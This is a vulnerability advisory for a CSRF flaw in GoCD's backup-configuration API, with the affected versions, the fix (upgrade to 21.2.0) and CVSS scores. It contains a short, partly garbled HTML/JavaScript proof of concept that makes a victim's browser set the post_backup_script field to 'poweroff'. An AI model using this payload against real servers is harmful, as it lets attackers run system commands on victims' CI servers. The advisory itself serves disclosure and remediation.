We found results for “


Date: April 1, 2021


In GoCD, versions 19.6.0 to 21.1.0 are vulnerable to Cross-Site Request Forgery due to missing CSRF protection at the `/go/api/config/backup` endpoint. An attacker can trick a victim to click on a malicious link which could change backup configurations or execute system commands in the post_backup_script field.


The module `GoCD` can be abused by Cross-Site Request Forgery due to missing CSRF protection at the `/go/api/config/backup` endpoint. Due to this flaw, an attacker can trick the victim to change the backup configuration settings such as executing system commands in the post_backup_script field and changing the backup schedule by enticing a user to click upon the attacker-controlled website.

PoC Details

Create a file with below content. When an authenticated user clicks on a malicious link sent by the attacker, a CSRF request will be sent to the legitimate server and the backup configuration is changed.

PoC Code

< html>
    < script> function backup() {
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.withCredentials = true;
        xmlhttp.open("POST", "http://localhost:8153/go/api/config/backup", true);
        xmlhttp.setRequestHeader("Accept", "application/vnd.go.cd.v1+json");
        "schedule": null,
        "post_backup_script": "poweroff",
        "email_on_success": false,
        "email_on_failure": false
        backup(); < /script>


Affected Environments



Upgrade to 21.2.0

Language: Java

Good to know:


Cross-Site Request Forgery (CSRF)


Upgrade Version

Upgrade to version 21.2.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): None
Confidentiality (C): Complete
Integrity (I): Complete
Availability (A): Complete
Additional information: